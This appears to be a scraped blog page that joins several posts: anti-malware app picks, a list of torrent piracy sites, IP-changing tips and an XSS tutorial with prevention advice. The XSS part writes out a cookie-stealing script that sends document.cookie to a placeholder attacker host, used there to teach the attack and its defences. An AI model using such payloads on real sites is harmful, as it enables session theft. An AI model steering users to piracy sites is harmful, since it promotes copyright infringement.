Saturday, July 14, 2018

Top 8 Best Malware Removal Tools and Apps of 2018

In Short Hacks: With the increasing use of Android smartphones all over the world, the threats to your phone’s security have also increased potentially. Whether you are an Android geek who does tons of internet related work on your Android or just happen to be someone that uses the android to function basic task, you should still have anti-virus or anti-malware installed on your smartphone for the sake of its safety and protection.

#1 Why should you have an anti-malware app?

If you do not have an anti-virus or anti-malware application on your smartphone, then beware your phone might be at risk! Risk of infection from corrupted apps and other kinds of malware. An ideal anti-malware app doesn’t only give you the assurance that your smartphone is safe from any sort of malware but also gives security to your privacy. But not every anti-malware app is safe for your phone. There are tons of such apps on the market that can cause harm to your smartphone.

#2 Difference between anti-virus and anti-malware apps:

Remember, there is a difference between anti-virus and anti-malware apps. The virus is a sub-category of malware, a specific type of malware is called ‘virus‘ whereas ‘malware’ is a rather general term to describe any sort of code that might function as a type of virus and harm your smartphone. You can also go through these Best Free Antivirus Software’s Of 2018 for Windows, MAC & Android. So an anti-malware app will obviously provide you with an even extensive security assurance.

#3 Best anti-malware apps for your smartphone:

So here we are with some of the best anti-malware apps for your Android device. The list includes both free and paid applications so choose according to your convenience.

Also Read: Top 6 Best Antivirus Apps For Android 2018

Best Malware Removal Apps (Free) 2018

1. Avira:

Avira falls under the category of the latest and best antivirus apps. The fact that its popularity grew at an unbelievable rate over the course of last one year speaks volume of its stature as an anti-virus app. The free version of the app includes device scans, external SD card scans, real-time protection and so much more. You can upgrade to pro version for prime features such as anti-theft support, blacklisting, privacy scanning and even device admin features. It’s also quite inexpensive than the other apps. However, the free version should do the work for you.

2. Bitdefender Antivirus:

The best thing about Bitdefender Antivirus is that it’s entirely free. It has maintained its features same over time. It offers a wide range of features such as scanning feature, quick performance, simple interface. This totally is an ideal app for basic anti-malware functions. It scans your phone and then begins to scan it again. There is also a paid version of the app which is rather large, more in-depth but we believe this one has everything that your Android device needs come with ads.

3. CM Security Lite:

Best RAM Cleaner Android Apps — CM Security | itechhacks

CM security Lite is also a totally free anti-malware app on your Android device. It functions moreover in the same manner as Bitdefender does. Though you don’t get boost or other cleaning features. It scans your device and your external SD card. It also has one great feature of schedule scanning which comes handy. For beginner and basic use it’s a sufficient app and one other great thing is that it doesn’t feature ads either.

4. TrustGo anti-virus and mobile go security:

TrustGo is another useful antivirus app which is absolutely free. It comes with features like device scanning, protection from malware and virus and app scanning. It also scans your memory card. TrustGo also includes some additional features such as app manager, data backup, privacy adviser, etc. Unlike many other antivirus apps you don’t need to upgrade to the pro version to use most of its features.

5. Google Play Protect:

Google play protect is a product of Google. It has a latest and a useful feature. It scans all the apps and then compares them to the Google Play versions of that app to determine the authenticity of the scanned apps. You get this app for free, and as a matter of fact, you probably have it on your device, but you don’t know about it. It’s much more than just an anti-malware app as it provides you with many additional and prominent features.

6. Norton Security:

Norton security comes with perks of its own. The app comes in both free and paid versions though it provides so many functions in the free version that includes protection from malware, spyware, etc. Additional features include saving device location when the battery is low, real-time protection, anti-theft features, and more. Its paid version is costly as it comes at a price of $39.99 per year which covers both your smartphone and computer.

7. McAfee:

Now McAfee is one among those names that come automatically in your mind whenever the word “anti-virus” is heard. This app needs no introduction as it includes scanning, anti-spyware, security-related features, an anti-theft feature. Besides, it can take pictures of the person who tried to steal your phone or your potential phone thief, record locations to the cloud before the phone shuts down, and much more.

8. Malwarebytes:

Malwarebytes is also one famous anti-malware app that can take care of most of the things related to your phone’s security. It features a very forward virus database, support for malware and ransomware, a permission tracker, and more. Beside it can also scan you WhatsApp, Facebook and SMS messages in case if they include some malware. It is priced at $1.49 per month or $11.99 per year.

Also Read: Top 7 Best RAM Cleaner Apps for Android 2018

Conclusion:

These were some of the best malware removal apps or your Android device. You can try them out and know which one suits your device the best. If we have not listed your favorite malware removal app above, then do let us know about it in the comments section below.
Incoming Keywords:

virus removal tools
malwarebytes anti-malware
best malware removal tool for windows 10
free malware removal tool windows 10
best free malware removal
remove malware

Top 8 Best Kickass Torrent Alternatives (KAT Working) 2018

In Short Hacks: After regular updates on the internet, the ups and downs coming every day in Torrent Marketplace. Before, Torrent was an amazing source to get any file, movies at free of cost. But, Time Flies. and it hits the biggest marketplace on the internet called “Torrent”. Every day we got to hear latest news Torrent Shutdown. But the most successful torrent so far was “Kickass Torrent”. But it is no longer available on Google. Whereas Many geeks keep buying new domains for kickass and coming up with terms like Kickass torrent alternatives KAT and much more.

Top 8 Best Kickass Torrent Alternatives For Downloading 2017 | itechhacks — 8 Best Kickass Torrent Alternatives

Kickass Torrent (Kat.ph ) Alternatives 2018: With numerous movies coming out every week, it is nearly impossible to watch every movie in theatres. It is due to both time and money. Also, there are instances where we wish to watch movies which are no longer available in theatres. The only solution to this obstacle is to download the movie. There are sites from where you can buy or rent movies, but again, that takes a heavy toll on your pocket. The perfect solution to this issue is to download that particular movie from a torrent website. On torrent, you will get any movie and that too, free of cost.

Well, Kickass (Kat) is a popular torrent website which provides torrent files and magnet links to download movies from. The abbreviation of this website is KAT (KickAss Torrent). However, this website is blocked in some countries due to which, people of that country are unable to access this website and download movies from torrent. Here, we are going to present you with some of the best alternatives to the Kickass torrent 2017 website using which you can download movies from torrent for free. So let’s take a look at these websites and check what they have to provide us with.
As we all know that kickass Torrent regularly changing its Domain and proxies. So If you want to access Kickass Torrent then you can Access it from these Domains: kat.cr kat.ph

Contents: [hide]

0.1 Waooo!! Kickass Torrents (katcr.co) is Back!

1 (kat.ph Kat.co ) KickAss Torrent Alternatives 2018
- 1.1 How does Torrent work?

Waooo!! Kickass Torrents (katcr.co) is Back!

Were you missing Kickass Torrents? Yea! Then this is a good news for all of the Kickass torrent fans because the original creators of this fictitious web of downloading torrents have returned to launch the site again. And here you will get to take the same experience as the old kickass torrent was. You can get everything from here.!
The new KAT is now available in the domain i.e: https://katcr.co/ and is the extension of the project died with the closure of Kat.cr and kat.ph The new site maintains the original web UI and UX and includes a huge directory of sections to files that have been obtained by the staff that was part of the page KickassTorrents the original.

Must Read: Top 18 Best Torrent Websites 2017 (Torrenting List)

(kat.ph Kat.co ) KickAss Torrent Alternatives 2018

#1 The Pirate Bay: Best Torrent Alternatives

Kickass Torrent Alternatives Working 2017 — The Pirate Bay

The short form of this website is TPB. This is another famous website which offers the files and magnet links of the torrent. The Pirate Bay website has a huge collection of data waiting for you to access them.The best alternative to old kickass and working of 2018.
You Can Download:

Audio
Video
Applications
Games
P*rn

#2 YTS | Kat.ph Alternative

Kickass Torrent Alternatives That Works — YTS.Ag

YTS.Ag is one of the best alternatives to the kickass torrent website 2017. Using this website, you can download all categories of YIFY torrents in 720p, 1080p, and 3D quality. This website claims to be the official home of YIFY movies but, the official YTF and YIFY owners have denied these claims and has kept its official brand name to itself. However, this website will do the work for you. kickass torrent.so

#3 ExtraTorrent: Largest Torrenting Site

The another great alternate to kickass is ExtraTorrent. Rumors were that this website is the home of EETV and ETRG release groups. This is the perfect destination for people as they can find extensive data offering torrents for movies, games, TV shows, pictures, etc. This website is constantly under development based on the feedbacks given by the users.

#4 RarBG

The feature that keeps this website apart from other websites is that you can watch the trailer of a movie online to have a quick look and also, inspect the top 10 torrents of each category. RarBG is Best Kickass Alternative Torrent that is working fine in 2017.Using this website, you can download movies, TV shows, games, music, software, etc. This website is a quickly growing website.

#5 Isohunt

This website was among the websites which were banned for providing torrent files and magnet links, but somehow, this site managed to get back. This website is among some of the most visited websites. Apart from its huge collection, people can also sign up and be a part of IsoHunt’s huge community and participate in forum discussions.

#6 Torrent Hound: Best Torrent Alternatives

This is an under-rated website. This website did not come into the limelight due to other huge websites such as KAT, TPB, etc. You will discover newest movies and TV shows here. This website provides with live statistics of its downloads and also, hosts a secure torrent client of its own to secure users while downloading the torrents.

Also Read: KATCR.CO KickassTorrent website

#7 1337X

This is one of the best alternatives for the Kickass (KAT) website. This website has all the data which Kickass website can provide you with. The user interface of this website is quite easy to use and understand. This website consists of eight categories which are movies, television, games, music, applications, anime, documentaries, other, and XXX. You can view the seeders and in each link.

#8 uTorrent: Best Torrenting Site

Another best Kickass Torrent Alternatives is uTorrent which comes live and shut down again and again but you can use some of its old IP traces to download movies from it. Before, it was one of the most used torrent sites on google. Most of the user is well known with this site. hence, you can use this as an alternative to a kat.cr domain.

Also Read: Top 6 Best Game Hacking Apps For Android Smartphones (No Root)

How does Torrent work?

Torrent is mainly divided into three parts. And all these three parts help torrent to work faster and helps to upload, download data such as movies, files etc

Seeders: Seeders are those who uploaded the file on torrent.
Leechers: Leechers are those who download the file (Like Us )
Peers: Downloading the file and sharing are known as Peers.

How To Change IP Address in 5 Second (Working)

Contents: [hide]

1 How To Change IP Address in 5 Second (Latest)

How To Change IP Address in 5 Second (Latest)

Change IP Address in 1 Second: IP address is a unique identity of any computer in their local server or another server. but sometime in hacking everyone wants to secure them for being caught in a trap. so here I will teach you how to change IP. Changing of IP address are not much easy but here you find a lot of easy ways to change IP address with video tutorials 2017. Every time you connect to the Internet, your ISP (Internet Service Provider) assigns an IP address to your computer that makes it possible for websites and applications to keep track of your online activities and also pin point your physical location. Therefore, in order to protect your Internet privacy, it is often necessary to change your IP address.

How To Change IP Address in 5 Second (Working) — Change IP Address in 5 Second 2017

Ways to Change IP Address
The following are some of the possible ways to change the IP address of your computer and here iTech Hacks shoot a video tutorial on How to change IP address in less than 5 seconds.

Also Read: How To Unlock Android Password/Pattern Screen Lock Without Losing Data 2017

How To Find Your IP Address:

Well, it’s so simple to find your IP. open Google and Type “MY IP“.and here you see your IP address.Follow my video tutorial to learn better.

#1. SaferVPN – Change IP in 5 Seconds

SaferVPN is a software which is available both for Windows and MAC users.By the help of this software, you can easily change your IP address in less than 5 seconds and SaferVPN network is very easy to use and very safe for anonymous browsing using other countries IP.

Download SaferVPN – Windows | MAC

#2. Using a VPN: Best Way to Change IP Address

Even though there are several methods to change your IP address, using a VPN proxy is by far the best and most secure way. The following are some of the most popular VPN proxies that most Internet users prefer.

Also Read: Top 8 Best Kickass Torrent Alternatives For Downloading 2017

#3. Hide My Ass VPN.

Hide My Ass is one of the most popular and trusted VPN service that provides a fast and secure proxy server to allow people to easily change their IP address and also obtain IP address from any country of their choice.

Download Hide My Ass VPN

VyprVPN – VyprVPN offers the world’s fastest VPN services to make it possible for its clients to easily change their real IP using a proxy and supports a wide range of operating systems.

Download VyprVPN

#4.Change IP by Restarting the Router
Change IP by Restarting the Router Every time you connect to the Internet your ISP may assign a different IP to your computer called dynamic IP. If your Internet connection uses a dynamic IP you can easily change it just by restarting your network device such as modem/router. All you need to do is just turn off its switch for a few seconds and turn it on again to get a different IP address assigned.
Unlike using a VPN, this method has quite a few drawbacks. Your newly assigned IP will have the same location or country as before and therefore if you’re trying to bypass a country block it would not be possible. change ip address 1 second online free Moreover, if your Internet connection uses a static IP address, you will get the same IP assigned no matter how many times you restart your router.
#5. Using Free Web Proxy to Change Your IP Address
If you cannot afford a VPN service or restarting the router doesn’t get you a new IP, you can try some of the free browser based proxy services that help you change your IP address and surf anonymously. The following are some of the websites that offer free proxy services:

www.onlineipchanger.com

www.rapidproxy.us
www.proxysite.com
www.englandproxy.co.uk
www.filterbypass.me

XSS Full Guide Tutorial: All About Cross Site Scripting

Many leet hackers attack on your websites with XSS. What is XSS? and how hackers hacks websites using XSS.in this tutorial i’ll show you a full overview guide on XSS. let me tell you one thing before learning XSS full tutorial “i am not taking any responsibility of any issue, Learn this only for educational purpose not for misuse”. Lets go ahead and see full tutorial on XSS Full Guide.

Full Guide of XSS: Cross Site Scripting 2017 – iTechhacks.com

#1 XSS Full Tutorial Guide : Overview

What is XSS?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user’s browser.

Inside Hacks: The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim’s browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.

How the malicious JavaScript is injected

The only way for the attacker to run his malicious JavaScript in the victim’s browser is to inject it into one of the pages that the victim downloads from the website. This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim’s browser.

Also Read: How To Remove or Unlock Memory Card Password Using Android or PC

In the example below, a simple server-side script is used to display the latest comment on a website:

print "<html>"
print "Latest comment:"
print database.latestComment
print "</html>"

The script assumes that a comment consists only of text. However, since the user input is included directly, an attacker could submit this comment: “<script>…</script>“. Any user visiting the page would now receive the following response:

<html>
Latest comment:
<script>...</script>
</html>

When the user’s browser loads the page, it will execute whatever JavaScript code is contained inside the <script> tags. The attacker has now succeeded with his attack.

What is malicious JavaScript?

At first, the ability to execute JavaScript in the victim’s browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user’s files and operating system. In fact, you could open your browser’s JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.

Also Read: Drown Attack Hacks ‘Thousands of Popular Websites’.

However, the possibility of JavaScript being malicious becomes more clear when you consider the following facts:

JavaScript has access to some of the user’s sensitive information, such as cookies.
JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using XMLHttpRequest and other mechanisms.
JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.

These facts combined can cause very serious security breaches, as we will explain next.

The consequences of malicious JavaScript

Among many other things, the ability to execute arbitrary JavaScript in another user’s browser allows an attacker to perform the following types of attacks:
Cookie theft: The attacker can access the victim’s cookies associated with the website using document.cookie, send them to his own server, and use them to extract sensitive information like session IDs.
Keylogging: The attacker can register a keyboard event listener usingaddEventListener and then send all of the user’s keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.
Phishing: The attacker can insert a fake login form into the page using DOM manipulation, set the form’s action attribute to target his own server, and then trick the user into submitting sensitive information.

Also Read: 5 Best Android Apps Not Available on Playstore 2017

Although these attacks differ significantly, they all have one crucial similarity: because the attacker has injected code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that website: it has access to the victim’s data for that website (such as cookies) and the host name shown in the URL bar will be that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything that the actual website can.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript in another user’s browser, the security of your website and its users has been compromised.
To emphasize this point, some examples in this tutorial will leave out the details of a malicious script by only showing <script>…</script>. This indicates that the mere presence of a script injected by the attacker is the problem, regardless of which specific code the script actually executes.

#2 Part Two: XSS Attacks

Actors in an XSS Attack:

Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, an XSS attack involves three actors: the website,the victim, and the attacker.

The website serves HTML pages to users who request them. In our examples, it is located at http://website/.
The website’s database is a database that stores some of the user input included in the website’s pages.
The victim is a normal user of the website who requests pages from it using his browser.
The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.
The attacker’s server is a web server controlled by the attacker for the sole purpose of stealing the victim’s sensitive information. In our examples, it is located at http://attacker/.

An example Attack Scenario:

In this example, we will assume that the attacker’s ultimate goal is to steal the victim’s cookies by exploiting an XSS vulnerability in the website. This can be done by having the victim’s browser parse the following HTML code:

Also Read: How To Unlock Android Password/Pattern Screen Lock Without Losing Data (Updated)

<script>
window.location='http://attacker/?cookie='+document.cookie
</script>

This script navigates the user’s browser to a different URL, triggering an HTTP request to the attacker’s server. The URL includes the victim’s cookies as a query parameter, which the attacker can extract from the request when it arrives to his server. Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script. It is important to note that the string itself is only malicious if it ultimately gets parsed as HTML in the victim’s browser, which can only happen as the result of an XSS vulnerability in the website.

How this Example Attack Works:

The diagram below illustrates how this example attack can be performed by an attacker:

#1 The attacker uses one of the website’s forms to insert a malicious string into the website’s database.
#2 The victim requests a page from the website.
#3 The website includes the malicious string from the database in the response and sends it to the victim.
#4 The victim’s browser executes the malicious script inside the response, sending the victim’s cookies to the attacker’s server.

Types of XSS:

While the goal of an XSS attack is always to execute malicious JavaScript in the victim’s browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:
Persistent XSS, where the malicious string originates from the website’s database.
Reflected XSS, where the malicious string originates from the victim’s request.
DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
The previous example illustrated a persistent XSS attack. We will now describe the other two types of XSS attacks: reflected XSS and DOM-based XSS.

Reflected XSS:

In a reflected XSS attack, the malicious string is part of the victim’s request to the website. The website then includes this malicious string in the response sent back to the user. The diagram below illustrates this scenario:

Also Read: How To Hack WiFi Password From Android (Without ROOT) 2017

#1 The attacker crafts a URL containing a malicious string and sends it to the victim.
#2 The victim is tricked by the attacker into requesting the URL from the website.
#3 The website includes the malicious string from the URL in the response.
#4 The victim’s browser executes the malicious script inside the response, sending the victim’s cookies to the attacker’s server.

How can reflected XSS succeed?

At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. Since nobody would willingly attack himself, there seems to be no way of actually performing the attack.

Also Read: How To Unlock PC Using USB Pendrive

As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself:

If the user targets a specific individual, the attacker can send the malicious URL to the victim (using e-mail or instant messaging, for example) and trick him into visiting it.
If the user targets a large group of people, the attacker can publish a link to the malicious URL (on his own website or on a social network, for example) and wait for visitors to click it.

These two methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.XSS Full Guide

DOM-based XSS:

DOM-based XSS is a variant of both persistent and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim’s browser until the website’s legitimate JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:

#1 The attacker crafts a URL containing a malicious string and sends it to the victim.
#2 The victim is tricked by the attacker into requesting the URL from the website.
#3 The website receives the request, but does not include the malicious string in the response.
#4 The victim’s browser executes the legitimate script inside the response, causing the malicious script to be inserted into the page.
#5 The victim’s browser executes the malicious script inserted into the page, sending the victim’s cookies to the attacker’s server.

What makes DOM-based XSS different:

In the previous examples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, which is then sent in a response to the victim. When the victim’s browser receives the response, it assumes the malicious script to be part of the page’s legitimate content and automatically executes it during page load as with any other script.

Also Read:How to Use Trial Softwares For Lifetime Free 2017

In the example of a DOM-based XSS attack, however, there is no malicious script inserted as part of the page; the only script that is automatically executed during page load is a legitimate part of the page. The problem is that this legitimate script directly makes use of user input in order to add HTML to the page. Because the malicious string is inserted into the page using innerHTML, it is parsed as HTML, causing the malicious script to be executed.-XSS Full Guide
The difference is subtle but important:

In traditional XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
In DOM-based XSS, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page’s legitimate JavaScript treating user input in an unsafe way.

#3 Part Three: Preventing XSS

Methods of preventing XSS
Recall that an XSS attack is a type of code injection: user input is mistakenly interpreted as malicious program code. In order to prevent this type of code injection, secure input handling is needed. For a web developer, there are two fundamentally different ways of performing secure input handling:
Encoding, which escapes the user input so that the browser interprets it only as data, not as code.
Validation, which filters the user input so that the browser interprets it as code without malicious commands.
While these are fundamentally different methods of preventing XSS, they share several common features that are important to understand when using either of them:

Also Read: How To Hack All Windows Password 2016 (Latest)

Context: Secure input handling needs to be performed differently depending on where in a page the user input is inserted.
Inbound/outbound: Secure input handling can be performed either when your website receives the input (inbound) or right before your website inserts the input into a page (outbound).
Client/server: Secure input handling can be performed either on the client-side or on the server-side, both of which are needed under different circumstances.
Before explaining in detail how encoding and validation work, we will describe each of these points.

Input handling contexts:

There are many contexts in a web page where user input might be inserted. For each of these, specific rules must be followed so that the user input cannot break out of its context and be interpreted as malicious code. Below are the most common contexts- XSS Full Guide

Context	Example code
HTML element content	`<div>userInput</div>`
HTML attribute value	`<input value="userInput">`
URL query value	`http://example.com/?parameter=userInput`
CSS value	`color: userInput`
JavaScript value	`var name = "userInput";`

Why context matters:

In all of the contexts described, an XSS vulnerability would arise if user input were inserted before first being encoded or validated. An attacker would then be able to inject malicious code by simply inserting the closing delimiter for that context and following it with the malicious code.
For example, if at some point a website inserts user input directly into an HTML attribute, an attacker would be able to inject a malicious script by beginning his input with a quotation mark, as shown below:

Application code	`<input value="userInput">`
Malicious string	`"><script>...</script><input value="`
Resulting code	`<input value=""><script>...</script><input value="">`

Encoding:

Encoding is the act of escaping user input so that the browser interprets it only as data, not as code. The most recognizable type of encoding in web development is HTML escaping, which converts characters like < and > into < and >, respectively.

Also Read: How To Increase RAM in PC 20GB+ Easily 2017

The following pseudocode is an example of how user input could be encoded using HTML escaping and then inserted into a page by a server-side script:

print "<html>"
print "Latest comment: "
print encodeHtml(userInput)
print "</html>"

If the user input were the string <script>…</script>, the resulting HTML would be as follows:

<html>
Latest comment:
&lt;script&gt;...&lt;/script&gt;
</html>

Encoding on the client-side
When encoding user input on the client-side using JavaScript, there are several built-in methods and properties that automatically encode all data in a context-aware manner:

Context	Method/property
HTML element content	`node.textContent = userInput`
HTML attribute value	`element.setAttribute(attribute, userInput)` or `element[attribute] = userInput`
URL query value	`window.encodeURIComponent(userInput)`
CSS value	`element.style.property = userInput`

Validation:

Validation is the act of filtering user input so that all malicious parts of it are removed, without necessarily removing all code in it. One of the most recognizable types of validation in web development is allowing some HTML elements (such as <em> and<strong>) but disallowing others (such as <script>).
There are two main characteristics of validation that differ between implementations:
Classification strategy: User input can be classified using either blacklisting or whitelisting.
Validation outcome: User input identified as malicious can either be rejected or sanitized.

Content Security Policy (CSP):

The disadvantage of protecting against XSS by using only secure input handling is that even a single lapse of security can compromise your website. A recent web standard called Content Security Policy (CSP) can mitigate this risk. Lets See XSS Full Guide:
CSP is used to constrain the browser viewing your page so that it can only use resources downloaded from trusted sources. A resource is a script, a stylesheet, an image, or some other type of file referred to by the page. This means that even if an attacker succeeds in injecting malicious content into your website, CSP can prevent it from ever being executed.

CSP in Action:

In the following example, an attacker has succeeded in injecting malicious code into a page:

<html>
Latest comment:
<script src="http://attacker/malicious‑script.js"></script>
</html>

With a properly defined CSP policy, the browser would not load and executemalicious‑script.js because http://attacker/ would not be in the set of trusted sources. Even though the website failed to securely handle user input in this case, the CSP policy prevented the vulnerability from causing any harm.
Even if the attacker had injected the script code inline rather than linking to an external file, a properly defined CSP policy disallowing inline JavaScript would also have prevented the vulnerability from causing any harm.

How to enable CSP:

By default, browsers do not enforce CSP. To enable CSP on your website, pages must be served with an additional HTTP header: Content‑Security‑Policy. Any page served with this header will have its security policy respected by the browser loading it, provided that the browser supports CSP.

Also Read: How To Jailbreak iOS iPhone in 2016 – iPhone Hacks

Since the security policy is sent with every HTTP response, it is possible for a server to set its policy on a page-by-page basis. The same policy can be applied to an entire website by providing the same CSP header in every response.
The value of the Content‑Security‑Policy header is a string defining one or more security policies that will take effect on your website. The syntax of this string will be described next.
The example headers in this section use newlines and indentation for clarity; this should not be present in an actual header.

Syntax of CSP

The syntax of a CSP header is as follows:

Content‑Security‑Policy:
    directive source‑expression, source‑expression, ...;
    directive ...;
    ...

Directives

The directives that can be used in a CSP header are as follows:

connect‑src
font‑src
frame‑src
img‑src
media‑src
object‑src
script‑src
style‑src

In addition to these, the special directive default‑src can be used to provide a default value for all directives that have not been included in the header.

#4 At Last: Summary XSS Full Guide

Summary: Overview of XSS

#1 XSS is a code injection attack made possible through insecure handling of user input.
#2 A successful XSS attack allows an attacker to execute malicious JavaScript in a victim’s browser.
#3 A successful XSS attack compromises the security of both the website and its users.

Summary: XSS Attacks

There are three major types of XSS attacks:

Persistent XSS, where the malicious input originates from the website’s database.
Reflected XSS, where the malicious input originates from the victim’s request.
DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.

All of these attacks are performed in different ways but have the same effect if they succeed.

Summary: Preventing XSS

#1 The most important way of preventing XSS attacks is to perform secure input handling.
#2Most of the time, encoding should be performed whenever user input is included in a page.
#3 In some cases, encoding has to be replaced by or complemented with validation.
#4 Secure input handling has to take into account which context of a page the user input is inserted into.
#5 To prevent all types of XSS attacks, secure input handling has to be performed in both client-side and server-side code.
#6 Content Security Policy provides an additional layer of defense for when secure input handling fails.